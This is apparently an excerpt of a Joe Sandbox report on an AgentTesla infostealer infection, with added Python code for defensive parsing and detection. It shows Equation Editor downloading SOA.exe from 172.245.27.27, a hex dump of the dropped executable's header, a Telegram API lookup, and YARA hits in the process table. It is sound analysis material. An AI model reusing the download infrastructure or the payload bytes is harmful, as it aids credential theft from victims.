                           May 13, 2022 16:58:19.032445908 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:19.032452106 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:19.032471895 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:19.032497883 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:19.032510042 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:19.032519102 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:19.032545090 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:19.032552004 CEST  49171        80         192.168.2.22   172.245.27.27
                           May 13, 2022 16:58:19.032569885 CEST  80           49171      172.245.27.27  192.168.2.22
                           May 13, 2022 16:58:19.032577991 CEST  49171        80         192.168.2.22   172.245.27.27
                           Timestamp                             Source Port  Dest Port  Source IP      Dest IP
                           May 13, 2022 16:59:58.960202932 CEST  55868        53         192.168.2.22   8.8.8.8
                           May 13, 2022 16:59:58.979049921 CEST  53           55868      8.8.8.8        192.168.2.22
                           Timestamp                             Source IP      Dest IP   Trans ID  OP Code             Name              Type            Class
                           May 13, 2022 16:59:58.960202932 CEST  192.168.2.22   8.8.8.8   0x39ac    Standard query (0)  api.telegram.org  A (IP address)  IN (0x0001)
                           Timestamp                             Source IP      Dest IP        Trans ID  Reply Code    Name              CName  Address          Type            Class
                           May 13, 2022 16:59:58.979049921 CEST  8.8.8.8        192.168.2.22   0x39ac    No error (0)  api.telegram.org  -      149.154.167.220  A (IP address)  IN (0x0001)
                          • 172.245.27.27
                           Session ID  Source IP      Source Port  Destination IP  Destination Port  Process
                           0           192.168.2.22   49171        172.245.27.27   80                C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                           Timestamp                             kBytes transferred  Direction  Data
                           May 13, 2022 16:58:18.682598114 CEST  2                   OUT        GET /SOA.exe HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: 172.245.27.27
                          Connection: Keep-Alive
                           May 13, 2022 16:58:18.802066088 CEST | 3 | IN | HTTP/1.1 200 OK
                          Date: Fri, 13 May 2022 14:58:18 GMT
                          Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.28
                          Last-Modified: Thu, 12 May 2022 04:27:00 GMT
                          ETag: "cb600-5dec8f8138359"
                          Accept-Ranges: bytes
                          Content-Length: 833024
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: application/x-msdownload
                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 90 8c 7c 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 a2 0c 00 00 12 00 00 00 00 00 00 1e c1 0c 00 00 20 00 00 00 e0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc c0 0c 00 4f 00 00 00 00 e0 0c 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 a1 0c 00 00 20 00 00 00 a2 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 0f 00 00 00 e0 0c 00 00 10 00 00 00 a4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0d 00 00 02 00 00 00 b4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c1 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 f0 80 08 00 dc 3f 04 00 03 00 00 00 86 03 00 06 e8 66 01 00 08 1a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 1e 02 28 23 00 00 0a 2a 26 00 02 28 24 00 00 0a 00 2a ce 73 25 00 00 0a 80 01 00 00 04 73 26 00 00 0a 80 02 00 00 04 73 27 00 00 0a 80 03 00 00 04 73 28 00 00 0a 80 04 00 00 04 73 
29 00 00 0a 80 05 00 00 04 2a 5a 00 03 fe 16 06 00 00 1b 6f 31 00 00 0a 00 03 fe 15 06 00 00 1b 2a 26 00 02 28 32 00 00 0a 00 2a 6a 02 02 7b 07 00 00 04 28 02 00 00 2b 7d 07 00 00 04 02 7b 07 00 00 04 2b 00 2a 6a 02 02 7b 08 00 00 04 28 03 00 00 2b 7d 08 00 00 04 02 7b 08 00 00 04 2b 00 2a 6a 02 02 7b 09 00 00 04 28 04 00 00 2b 7d 09 00 00 04 02 7b 09 00 00 04 2b 00 2a 6a 02 02 7b 0a 00 00 04 28 05 00 00 2b 7d 0a 00 00 04 02 7b 0a 00 00 04 2b 00 2a 6a 02 02 7b 0b 00 00 04 28 06 00 00 2b 7d 0b 00 00 04 02 7b 0b 00 00 04 2b 00 2a 6a 02 02 7b 0c 00 00 04 28 07 00 00 2b 7d 0c 00 00 04 02 7b 0c 00 00 04 2b 00 2a 6a 02 02 7b 0d 00 00 04 28 08 00 00 2b 7d 0d 00 00 04 02 7b 0d 00 00 04 2b 00 2a 6a 02 02 7b 0e 00 00 04 28 09 00 00 2b 7d 0e 00 00 04 02 7b 0e 00 00 04 2b 00 2a 6a 02 02 7b 0f 00 00 04 28 0a 00 00 2b 7d 0f 00 00 04 02 7b 0f 00 00 04 2b 00 2a 6a 02 02 7b 10 00 00 04 28 0b 00 00 2b 7d 10 00 00 04 02 7b 10 00 00 04 2b 00 2a 6a 02 02 7b 11 00 00 04 28 0c 00 00 2b 7d 11 00 00 04 02 7b 11 00 00 04 2b 00 2a 6a 02 02 7b 12 00 00 04 28 0d 00 00 2b 7d
                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL|bP @ @O H.text$ `.rsrc@@.reloc@BH?f*(#*&($*s%s&s's(s)*Zo1*&(2*j{(+}{+*j{(+}{+*j{(+}{+*j{(+}{+*j{(+}{+*j{(+}{+*j{(+}{+*j{(+}{+*j{(+}{+*j{(+}{+*j{(+}{+*j{(+}
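The response body above begins with the downloaded executable itself, and the report lists the file EQNEDT32.EXE wrote afterwards, C:\Users\Public\vbc.exe, at 833024 bytes. As an added example (not part of the Joe Sandbox report), the Python below parses the first 0x200 bytes of the Data Raw field as a PE header and cross-checks what the headers imply about the file against the Content-Length of the response and the size of the dropped file. The hex is the page's own data regrouped 16 bytes per row; the function names, the set of data directories read and the checks chosen are this example's, and it handles PE32 images only.

```python
import struct
from datetime import datetime, timezone

# Copied from this report: Content-Length of the 200 OK above, size of C:\Users\Public\vbc.exe.
RESPONSE_CONTENT_LENGTH = 833024
DROPPED_FILE_SIZE = 833024

# First 0x200 bytes of the GET /SOA.exe response body ("Data Raw" above), 16 bytes per row.
SOA_EXE_HEAD = bytes.fromhex("""
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00
b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00
0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68
69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f
74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20
6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
50 45 00 00 4c 01 03 00 90 8c 7c 62 00 00 00 00
00 00 00 00 e0 00 02 01 0b 01 50 00 00 a2 0c 00
00 12 00 00 00 00 00 00 1e c1 0c 00 00 20 00 00
00 e0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00
04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00
00 20 0d 00 00 02 00 00 00 00 00 00 02 00 40 85
00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00
00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00
cc c0 0c 00 4f 00 00 00 00 e0 0c 00 00 0f 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00
00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00
00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00
24 a1 0c 00 00 20 00 00 00 a2 0c 00 00 02 00 00
00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60
2e 72 73 72 63 00 00 00 00 0f 00 00 00 e0 0c 00
00 10 00 00 00 a4 0c 00 00 00 00 00 00 00 00 00
00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00
0c 00 00 00 00 00 0d 00 00 02 00 00 00 b4 0c 00
00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
""")

# Data-directory slots this example reads (index in IMAGE_OPTIONAL_HEADER.DataDirectory).
DIRECTORY_NAMES = {1: "import", 2: "resource", 5: "basereloc", 12: "iat", 14: "clr"}


def parse_pe_headers(data):
    """Parse DOS, COFF, optional (PE32) and section headers from the start of a file."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew=%#x" % e_lfanew)
    (machine, n_sections, timestamp, _symtab, _nsyms,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                      # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic != 0x10B:                       # PE32 only; PE32+ (0x20B) shifts the fields below
        raise ValueError("not a PE32 image, magic=%#x" % magic)
    entry_point, = struct.unpack_from("<I", data, opt + 16)
    image_base, = struct.unpack_from("<I", data, opt + 28)
    subsystem, = struct.unpack_from("<H", data, opt + 68)
    n_dirs, = struct.unpack_from("<I", data, opt + 92)
    directories = {}
    for idx, name in DIRECTORY_NAMES.items():
        if idx < n_dirs:                     # (rva, size) of each directory we care about
            directories[name] = struct.unpack_from("<II", data, opt + 96 + idx * 8)
    sections, first = [], opt + opt_size     # section table directly follows the optional header
    for i in range(n_sections):
        (name, vsize, rva, raw_size, raw_ptr, _reloc, _lines,
         _nreloc, _nlines, flags) = struct.unpack_from("<8sIIIIIIHHI", data, first + i * 40)
        sections.append({"name": name.rstrip(b"\0").decode("ascii"), "virtual_size": vsize,
                         "rva": rva, "raw_size": raw_size, "raw_ptr": raw_ptr, "flags": flags})
    return {"e_lfanew": e_lfanew, "machine": machine, "timestamp": timestamp,
            "characteristics": characteristics, "entry_point": entry_point,
            "image_base": image_base, "subsystem": subsystem,
            "directories": directories, "sections": sections}


def cross_check(hdr, content_length, dropped_size):
    """Consistency checks a responder runs on the download versus the dropped file."""
    end_of_last_section = max(s["raw_ptr"] + s["raw_size"] for s in hdr["sections"])
    return {
        "is_dotnet": hdr["directories"].get("clr", (0, 0))[1] != 0,      # CLR runtime header present
        "expected_file_size": end_of_last_section,
        "body_matches_headers": end_of_last_section == content_length,  # nothing appended as overlay
        "drop_is_full_download": dropped_size == content_length,
        "build_time_utc": datetime.fromtimestamp(hdr["timestamp"], tz=timezone.utc)
                                  .strftime("%Y-%m-%d %H:%M:%S"),
    }


if __name__ == "__main__":
    hdr = parse_pe_headers(SOA_EXE_HEAD)
    for s in hdr["sections"]:
        print(f'{s["name"]:8} rva={s["rva"]:#08x} raw={s["raw_ptr"]:#08x}+{s["raw_size"]:#x} '
              f'flags={s["flags"]:#010x}')
    for key, value in cross_check(hdr, RESPONSE_CONTENT_LENGTH, DROPPED_FILE_SIZE).items():
        print(f"{key}: {value}")
```

Only header bytes are needed for these checks, which is why they work on the truncated Data Raw field: the end of the last section (.reloc at 0xcb400 + 0x200 = 0xcb600) equals the 833024-byte Content-Length, so the server sent the file without an overlay and the dropped vbc.exe is the complete download; the same value appears as cb600 in the Apache ETag above. The CLR data directory at RVA 0x2008 is why the process table reports the drop as .NET, and the COFF timestamp 0x627c8c90 decodes to 2022-05-12 04:26:56 UTC, four seconds before the Last-Modified header, so the file was built and placed on the server in the same minute. Hashing, by contrast, needs the whole body; the MD5 given for vbc.exe in the process table cannot be reproduced from this prefix.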



                           Target ID: 0
                           Start time: 16:57:16
                           Start date: 13/05/2022
                           Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                           Wow64 process (32bit): false
                           Commandline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                           Imagebase: 0x13fbd0000
                           File size: 28253536 bytes
                           MD5 hash: D53B85E21886D2AF9815C377537BCAC3
                           Has elevated privileges: true
                           Has administrator privileges: true
                           Programmed in: C, C++ or other language
                           Reputation: high

                           Target ID: 2
                           Start time: 16:57:41
                           Start date: 13/05/2022
                           Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                           Wow64 process (32bit): true
                           Commandline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                           Imagebase: 0x400000
                           File size: 543304 bytes
                           MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
                           Has elevated privileges: true
                           Has administrator privileges: true
                           Programmed in: C, C++ or other language
                           Reputation: high

                           Target ID: 4
                           Start time: 16:57:45
                           Start date: 13/05/2022
                           Path: C:\Users\Public\vbc.exe
                           Wow64 process (32bit): true
                           Commandline: "C:\Users\Public\vbc.exe"
                           Imagebase: 0x8d0000
                           File size: 833024 bytes
                           MD5 hash: F18604D5FC3E2930E85C403E0E80A459
                           Has elevated privileges: true
                           Has administrator privileges: true
                           Programmed in: .Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 46%, ReversingLabs
                           Reputation: low

                           Target ID: 5
                           Start time: 16:57:55
                           Start date: 13/05/2022
                           Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                           Wow64 process (32bit): true
                           Commandline: {path}
                           Imagebase: 0x13d0000
                           File size: 45216 bytes
                           MD5 hash: 62CE5EF995FD63A1847A196C2E8B267B
                           Has elevated privileges: true
                           Has administrator privileges: true
                           Programmed in: .Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.985108064.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.985108064.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.985373041.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.985373041.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                           Reputation: moderate
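The process table above and the HTTP session earlier on this page contain the observations a detection engineer would key on: Equation Editor opening a network session, an executable starting from C:\Users\Public, and a .NET Framework utility (RegSvcs.exe) starting ten seconds after it with the AgentTesla Yara matches already present in its memory at start. As an added example that is not part of the Joe Sandbox report, the Python below encodes those observations as constructed event records copied from the tables and runs three rules over them. The rule names, the 60-second window, the list of .NET utilities treated as hollowing hosts and the reading of the RegSvcs.exe start as hollowing are this example's assumptions, not findings the report states.

```python
from pathlib import PureWindowsPath

# Process starts copied from the process table on this page (13/05/2022, sandbox local time).
PROCESS_EVENTS = [
    {"target": 0, "time": "16:57:16", "path": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"},
    {"target": 2, "time": "16:57:41",
     "path": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"},
    {"target": 4, "time": "16:57:45", "path": r"C:\Users\Public\vbc.exe"},
    {"target": 5, "time": "16:57:55",
     "path": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"},
]
# Network session copied from the HTTP session table on this page.
NETWORK_EVENTS = [
    {"process": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "dst_ip": "172.245.27.27", "dst_port": 80, "request": "GET /SOA.exe HTTP/1.1"},
]

# Rule parameters: assumptions of this example, not values taken from the report.
OFFICE_HELPERS = {"eqnedt32.exe"}                   # Equation Editor never needs a socket
DROP_DIRS = [PureWindowsPath(r"C:\Users\Public")]   # world-writable staging directory
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}  # hollowing hosts
HOST_WINDOW_SECONDS = 60


def basename(path):
    return PureWindowsPath(path).name.lower()


def in_drop_dir(path):
    """True if path lies under one of DROP_DIRS (PureWindowsPath compares case-insensitively)."""
    return any(d in PureWindowsPath(path).parents for d in DROP_DIRS)


def to_seconds(hms):
    h, m, s = (int(x) for x in hms.split(":"))
    return h * 3600 + m * 60 + s


def rule_office_helper_network(net_events):
    """An Office helper process (Equation Editor here) opening a network session."""
    return [("office_helper_network", e["process"], f'{e["dst_ip"]}:{e["dst_port"]} {e["request"]}')
            for e in net_events if basename(e["process"]) in OFFICE_HELPERS]


def rule_exec_from_drop_dir(proc_events):
    """An executable started from a world-writable staging directory."""
    return [("exec_from_drop_dir", e["path"], f'started {e["time"]}')
            for e in proc_events if in_drop_dir(e["path"])]


def rule_dotnet_host_after_drop(proc_events, window=HOST_WINDOW_SECONDS):
    """A .NET Framework utility started within `window` seconds after an executable from a
    drop directory: the utility is then a likely hollowing host (assumption of this example)."""
    drops = [e for e in proc_events if in_drop_dir(e["path"])]
    hits = []
    for host in proc_events:
        if basename(host["path"]) not in DOTNET_HOSTS:
            continue
        for d in drops:
            delta = to_seconds(host["time"]) - to_seconds(d["time"])
            if 0 <= delta <= window:
                hits.append(("dotnet_host_after_drop", host["path"], f'{delta}s after {d["path"]}'))
    return hits


def run_all(proc_events, net_events):
    """Return (rule, subject, detail) tuples for every rule that fires."""
    return (rule_office_helper_network(net_events)
            + rule_exec_from_drop_dir(proc_events)
            + rule_dotnet_host_after_drop(proc_events))


if __name__ == "__main__":
    for rule, subject, detail in run_all(PROCESS_EVENTS, NETWORK_EVENTS):
        print(f"{rule:24} {subject}  ({detail})")
```

The first rule needs no timing at all and is the cheapest to deploy: EQNEDT32.EXE has no legitimate reason to open a socket, so the single session to 172.245.27.27:80 is enough on its own. The third rule is the noisiest of the three and is deliberately scoped to a short window after a drop-directory start, since the listed utilities are also run by legitimate installers; EXCEL.EXE, started before the drop, fires nothing.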

                          No disassembly